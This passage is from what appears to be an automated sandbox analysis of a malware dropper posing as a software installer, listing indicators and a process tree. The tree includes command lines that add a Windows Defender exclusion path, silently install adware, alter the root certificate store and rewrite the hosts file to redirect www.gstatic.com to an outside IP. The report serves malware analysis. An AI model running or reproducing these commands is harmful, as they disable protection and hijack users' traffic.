678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\0ADEF1D7458FF50D2CB80F9B486455321D405097 search_awesome.exe -
NTFS ADS 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 771364.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\freevpn_setup_e_wda0e98dn41o9k9a2j7ngd88.exe:Zone.Identifier msedge.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4780 powershell.exe 4780 powershell.exe 1280 WerFault.exe 1280 WerFault.exe 1180 WerFault.exe 1180 WerFault.exe 5184 WerFault.exe 5184 WerFault.exe 4780 powershell.exe 4780 powershell.exe 5368 WerFault.exe 5368 WerFault.exe 5748 WerFault.exe 5748 WerFault.exe 5852 WerFault.exe 5852 WerFault.exe 5236 setup_2.tmp 5236 setup_2.tmp 2440 1279257.exe 2440 1279257.exe 5268 WerFault.exe 5268 WerFault.exe 5316 WerFault.exe 5316 WerFault.exe 5228 2902519.exe 5228 2902519.exe 5168 WerFault.exe 5168 WerFault.exe 5640 8817294.exe 5640 8817294.exe 5600 3278603.exe 5600 3278603.exe 4448 ultramediaburner.tmp 4448 ultramediaburner.tmp 1368 WerFault.exe 1368 WerFault.exe 3136 cmd.exe 3136 cmd.exe 2912 WerFault.exe 2912 WerFault.exe 5220 cmd.exe 5220 cmd.exe 2340 4447160.exe 2340 4447160.exe 5760 Xigysanupi.exe 5760 Xigysanupi.exe 5760 Xigysanupi.exe 5760 Xigysanupi.exe 5760 Xigysanupi.exe 5760 Xigysanupi.exe 5760 Xigysanupi.exe 5760 Xigysanupi.exe 5760 Xigysanupi.exe 5760 Xigysanupi.exe 5760 Xigysanupi.exe 5760 Xigysanupi.exe 5760 Xigysanupi.exe 5760 Xigysanupi.exe 5760 Xigysanupi.exe 5760 Xigysanupi.exe 5760 Xigysanupi.exe 5760 Xigysanupi.exe 5760 Xigysanupi.exe 5760 Xigysanupi.exe -
Suspicious behavior: SetClipboardViewer 2 IoCs
pid Process 6116 WinHoster.exe 1420 4590327.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2236 Fri1553f0ee90.exe Token: SeDebugPrivilege 5112 Fri155442fc38b.exe Token: SeRestorePrivilege 1180 WerFault.exe Token: SeBackupPrivilege 1180 WerFault.exe Token: SeBackupPrivilege 1180 WerFault.exe Token: SeDebugPrivilege 2440 1279257.exe Token: SeDebugPrivilege 4780 powershell.exe Token: SeDebugPrivilege 452 2.exe Token: SeDebugPrivilege 4460 PublicDwlBrowser1100.exe Token: SeDebugPrivilege 5228 2902519.exe Token: SeDebugPrivilege 5992 BearVpn 3.exe Token: SeDebugPrivilege 5640 8817294.exe Token: SeDebugPrivilege 5600 3278603.exe Token: SeDebugPrivilege 2348 zab2our.exe Token: SeIncreaseQuotaPrivilege 4780 powershell.exe Token: SeSecurityPrivilege 4780 powershell.exe Token: SeTakeOwnershipPrivilege 4780 powershell.exe Token: SeLoadDriverPrivilege 4780 powershell.exe Token: SeSystemProfilePrivilege 4780 powershell.exe Token: SeSystemtimePrivilege 4780 powershell.exe Token: SeProfSingleProcessPrivilege 4780 powershell.exe Token: SeIncBasePriorityPrivilege 4780 powershell.exe Token: SeCreatePagefilePrivilege 4780 powershell.exe Token: SeBackupPrivilege 4780 powershell.exe Token: SeRestorePrivilege 4780 powershell.exe Token: SeShutdownPrivilege 4780 powershell.exe Token: SeDebugPrivilege 4780 powershell.exe Token: SeSystemEnvironmentPrivilege 4780 powershell.exe Token: SeRemoteShutdownPrivilege 4780 powershell.exe Token: SeUndockPrivilege 4780 powershell.exe Token: SeManageVolumePrivilege 4780 powershell.exe Token: 33 4780 powershell.exe Token: 34 4780 powershell.exe Token: 35 4780 powershell.exe Token: 36 4780 powershell.exe Token: SeDebugPrivilege 1368 WerFault.exe Token: SeDebugPrivilege 5220 cmd.exe Token: SeDebugPrivilege 5568 8843710.exe Token: SeDebugPrivilege 2340 4447160.exe Token: SeDebugPrivilege 5364 Devugaraesae.exe Token: SeDebugPrivilege 5760 Xigysanupi.exe Token: SeDebugPrivilege 4548 Process not Found Token: SeSecurityPrivilege 5480 msiexec.exe Token: SeCreateTokenPrivilege 6648 installer.exe Token: SeAssignPrimaryTokenPrivilege 6648 installer.exe Token: SeLockMemoryPrivilege 6648 installer.exe Token: SeIncreaseQuotaPrivilege 6648 installer.exe Token: SeMachineAccountPrivilege 6648 installer.exe Token: SeTcbPrivilege 6648 installer.exe Token: SeSecurityPrivilege 6648 installer.exe Token: SeTakeOwnershipPrivilege 6648 installer.exe Token: SeLoadDriverPrivilege 6648 installer.exe Token: SeSystemProfilePrivilege 6648 installer.exe Token: SeSystemtimePrivilege 6648 installer.exe Token: SeProfSingleProcessPrivilege 6648 installer.exe Token: SeIncBasePriorityPrivilege 6648 installer.exe Token: SeCreatePagefilePrivilege 6648 installer.exe Token: SeCreatePermanentPrivilege 6648 installer.exe Token: SeBackupPrivilege 6648 installer.exe Token: SeRestorePrivilege 6648 installer.exe Token: SeShutdownPrivilege 6648 installer.exe Token: SeDebugPrivilege 6648 installer.exe Token: SeAuditPrivilege 6648 installer.exe Token: SeSystemEnvironmentPrivilege 6648 installer.exe -
Suspicious use of FindShellTrayWindow 17 IoCs
pid Process 5236 setup_2.tmp 4448 ultramediaburner.tmp 6648 installer.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 2824 FreeVPN.exe -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 2824 FreeVPN.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 5900 cmd.exe 2824 FreeVPN.exe 2824 FreeVPN.exe 3024 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3040 wrote to memory of 4260 3040 setup_x86_x64_install.exe 77 PID 3040 wrote to memory of 4260 3040 setup_x86_x64_install.exe 77 PID 3040 wrote to memory of 4260 3040 setup_x86_x64_install.exe 77 PID 4260 wrote to memory of 3548 4260 setup_installer.exe 78 PID 4260 wrote to memory of 3548 4260 setup_installer.exe 78 PID 4260 wrote to memory of 3548 4260 setup_installer.exe 78 PID 3548 wrote to memory of 4528 3548 setup_install.exe 82 PID 3548 wrote to memory of 4528 3548 setup_install.exe 82 PID 3548 wrote to memory of 4528 3548 setup_install.exe 82 PID 3548 wrote to memory of 4544 3548 setup_install.exe 83 PID 3548 wrote to memory of 4544 3548 setup_install.exe 83 PID 3548 wrote to memory of 4544 3548 setup_install.exe 83 PID 3548 wrote to memory of 4644 3548 setup_install.exe 92 PID 3548 wrote to memory of 4644 3548 setup_install.exe 92 PID 3548 wrote to memory of 4644 3548 setup_install.exe 92 PID 3548 wrote to memory of 4700 3548 setup_install.exe 85 PID 3548 wrote to memory of 4700 3548 setup_install.exe 85 PID 3548 wrote to memory of 4700 3548 setup_install.exe 85 PID 3548 wrote to memory of 4856 3548 setup_install.exe 90 PID 3548 wrote to memory of 4856 3548 setup_install.exe 90 PID 3548 wrote to memory of 4856 3548 setup_install.exe 90 PID 3548 wrote to memory of 4888 3548 setup_install.exe 86 PID 3548 wrote to memory of 4888 3548 setup_install.exe 86 PID 3548 wrote to memory of 4888 3548 setup_install.exe 86 PID 3548 wrote to memory of 4496 3548 setup_install.exe 89 PID 3548 wrote to memory of 4496 3548 setup_install.exe 89 PID 3548 wrote to memory of 4496 3548 setup_install.exe 89 PID 3548 wrote to memory of 4568 3548 setup_install.exe 88 PID 3548 wrote to memory of 4568 3548 setup_install.exe 88 PID 3548 wrote to memory of 4568 3548 setup_install.exe 88 PID 4528 wrote to memory of 4780 4528 cmd.exe 87 PID 4528 wrote to memory of 4780 4528 cmd.exe 87 PID 4528 wrote to memory of 4780 4528 cmd.exe 87 PID 4644 wrote to memory of 4972 4644 cmd.exe 91 PID 4644 wrote to memory of 4972 4644 cmd.exe 91 PID 4644 wrote to memory of 4972 4644 cmd.exe 91 PID 4856 wrote to memory of 5112 4856 cmd.exe 93 PID 4856 wrote to memory of 5112 4856 cmd.exe 93 PID 4544 wrote to memory of 4448 4544 cmd.exe 94 PID 4544 wrote to memory of 4448 4544 cmd.exe 94 PID 4544 wrote to memory of 4448 4544 cmd.exe 94 PID 4888 wrote to memory of 3828 4888 cmd.exe 95 PID 4888 wrote to memory of 3828 4888 cmd.exe 95 PID 4888 wrote to memory of 3828 4888 cmd.exe 95 PID 4568 wrote to memory of 2236 4568 cmd.exe 96 PID 4568 wrote to memory of 2236 4568 cmd.exe 96 PID 4700 wrote to memory of 3780 4700 cmd.exe 97 PID 4700 wrote to memory of 3780 4700 cmd.exe 97 PID 4700 wrote to memory of 3780 4700 cmd.exe 97 PID 3780 wrote to memory of 648 3780 Fri157e25afd971.exe 102 PID 3780 wrote to memory of 648 3780 Fri157e25afd971.exe 102 PID 3780 wrote to memory of 648 3780 Fri157e25afd971.exe 102 PID 344 wrote to memory of 3828 344 WerFault.exe 95 PID 344 wrote to memory of 3828 344 WerFault.exe 95 PID 960 wrote to memory of 4448 960 WerFault.exe 94 PID 960 wrote to memory of 4448 960 WerFault.exe 94 PID 2236 wrote to memory of 2096 2236 Fri1553f0ee90.exe 105 PID 2236 wrote to memory of 2096 2236 Fri1553f0ee90.exe 105 PID 2236 wrote to memory of 2096 2236 Fri1553f0ee90.exe 105 PID 648 wrote to memory of 2348 648 Fri157e25afd971.tmp 106 PID 648 wrote to memory of 2348 648 Fri157e25afd971.tmp 106 PID 5112 wrote to memory of 2440 5112 Fri155442fc38b.exe 107 PID 5112 wrote to memory of 2440 5112 Fri155442fc38b.exe 107 PID 5112 wrote to memory of 4968 5112 Fri155442fc38b.exe 108
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3040 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4260 -
C:\Users\Admin\AppData\Local\Temp\7zS4A0355E3\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS4A0355E3\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3548 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:4528 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4780
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri1544861ac3fe6a.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4544 -
C:\Users\Admin\AppData\Local\Temp\7zS4A0355E3\Fri1544861ac3fe6a.exeFri1544861ac3fe6a.exe5⤵
- Executes dropped EXE
PID:4448 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4448 -s 2806⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:1280
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri157e25afd971.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4700 -
C:\Users\Admin\AppData\Local\Temp\7zS4A0355E3\Fri157e25afd971.exeFri157e25afd971.exe5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3780 -
C:\Users\Admin\AppData\Local\Temp\is-2N7VK.tmp\Fri157e25afd971.tmp"C:\Users\Admin\AppData\Local\Temp\is-2N7VK.tmp\Fri157e25afd971.tmp" /SL5="$40134,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS4A0355E3\Fri157e25afd971.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:648 -
C:\Users\Admin\AppData\Local\Temp\is-LIPCF.tmp\zab2our.exe"C:\Users\Admin\AppData\Local\Temp\is-LIPCF.tmp\zab2our.exe" /S /UID=burnerch27⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:2348 -
C:\Program Files\Windows Mail\BJVYNOHLNE\ultramediaburner.exe"C:\Program Files\Windows Mail\BJVYNOHLNE\ultramediaburner.exe" /VERYSILENT8⤵
- Executes dropped EXE
PID:4128 -
C:\Users\Admin\AppData\Local\Temp\is-00LJP.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-00LJP.tmp\ultramediaburner.tmp" /SL5="$5016A,281924,62464,C:\Program Files\Windows Mail\BJVYNOHLNE\ultramediaburner.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:4448 -
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵
- Executes dropped EXE
PID:5136
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\28-a1489-8f1-8b982-164bca8a21b85\Devugaraesae.exe"C:\Users\Admin\AppData\Local\Temp\28-a1489-8f1-8b982-164bca8a21b85\Devugaraesae.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5364 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵
- Adds Run key to start application
- Enumerates system info in registry
- NTFS ADS
- Suspicious use of FindShellTrayWindow
PID:3152 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0x100,0x110,0x7ff864cc46f8,0x7ff864cc4708,0x7ff864cc471810⤵PID:5896
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,14175196936682400171,12730334350699191083,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:210⤵PID:6848
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,14175196936682400171,12730334350699191083,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:310⤵PID:6880
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,14175196936682400171,12730334350699191083,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2668 /prefetch:810⤵PID:6904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14175196936682400171,12730334350699191083,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3472 /prefetch:110⤵PID:7144
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14175196936682400171,12730334350699191083,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:110⤵PID:7096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14175196936682400171,12730334350699191083,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3012 /prefetch:110⤵PID:4568
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14175196936682400171,12730334350699191083,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5132 /prefetch:110⤵PID:3100
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14175196936682400171,12730334350699191083,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4376 /prefetch:110⤵PID:3116
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,14175196936682400171,12730334350699191083,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3076 /prefetch:810⤵PID:2832
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,14175196936682400171,12730334350699191083,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3076 /prefetch:810⤵PID:6104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14175196936682400171,12730334350699191083,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3088 /prefetch:110⤵PID:1776
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,14175196936682400171,12730334350699191083,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5332 /prefetch:210⤵PID:2400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2120,14175196936682400171,12730334350699191083,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1636 /prefetch:810⤵PID:2912
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14175196936682400171,12730334350699191083,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5440 /prefetch:110⤵PID:4436
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14175196936682400171,12730334350699191083,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:110⤵PID:7032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14175196936682400171,12730334350699191083,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1840 /prefetch:110⤵PID:1284
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14175196936682400171,12730334350699191083,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5140 /prefetch:110⤵PID:7144
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2120,14175196936682400171,12730334350699191083,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3780 /prefetch:810⤵PID:3676
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2120,14175196936682400171,12730334350699191083,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3120 /prefetch:810⤵PID:920
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14175196936682400171,12730334350699191083,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4300 /prefetch:110⤵PID:3040
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14175196936682400171,12730334350699191083,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1648 /prefetch:110⤵PID:3396
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14175196936682400171,12730334350699191083,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4140 /prefetch:110⤵PID:3788
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2120,14175196936682400171,12730334350699191083,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5092 /prefetch:810⤵PID:4012
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14175196936682400171,12730334350699191083,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5440 /prefetch:110⤵PID:4176
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2120,14175196936682400171,12730334350699191083,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6224 /prefetch:810⤵PID:5352
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2120,14175196936682400171,12730334350699191083,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6332 /prefetch:810⤵
- NTFS ADS
PID:2848
-
-
C:\Users\Admin\Downloads\freevpn_setup_e_wda0e98dn41o9k9a2j7ngd88.exe"C:\Users\Admin\Downloads\freevpn_setup_e_wda0e98dn41o9k9a2j7ngd88.exe"10⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:5040 -
C:\Windows\SysWOW64\sc.exesc stop FreeVPN11⤵PID:5692
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "sc query "FreeVPN" | FIND /C "1060""11⤵PID:2308
-
C:\Windows\SysWOW64\sc.exesc query "FreeVPN"12⤵PID:5428
-
-
C:\Windows\SysWOW64\find.exeFIND /C "1060"12⤵PID:8
-
-
-
C:\Program Files (x86)\FreeVPN\search_awesome.exe"C:\Program Files (x86)\FreeVPN\search_awesome.exe" /S11⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies system certificate store
PID:3084 -
C:\Windows\SysWOW64\sc.exesc stop Search_Awesome12⤵PID:5588
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "sc query "Search_Awesome" | FIND /C "1060""12⤵PID:3388
-
C:\Windows\SysWOW64\find.exeFIND /C "1060"13⤵PID:1812
-
-
C:\Windows\SysWOW64\sc.exesc query "Search_Awesome"13⤵PID:6300
-
-
-
C:\Program Files (x86)\Search Awesome\setup.exe"C:\Program Files (x86)\Search Awesome\setup.exe" add 139.162.197.244 www.gstatic.com C:\Windows\system32\drivers\etc\hosts12⤵
- Drops file in Drivers directory
- Executes dropped EXE
PID:2476
-
-
C:\Program Files (x86)\Search Awesome\setup.exe"C:\Program Files (x86)\Search Awesome\setup.exe" -clean12⤵
- Executes dropped EXE
PID:5700 -
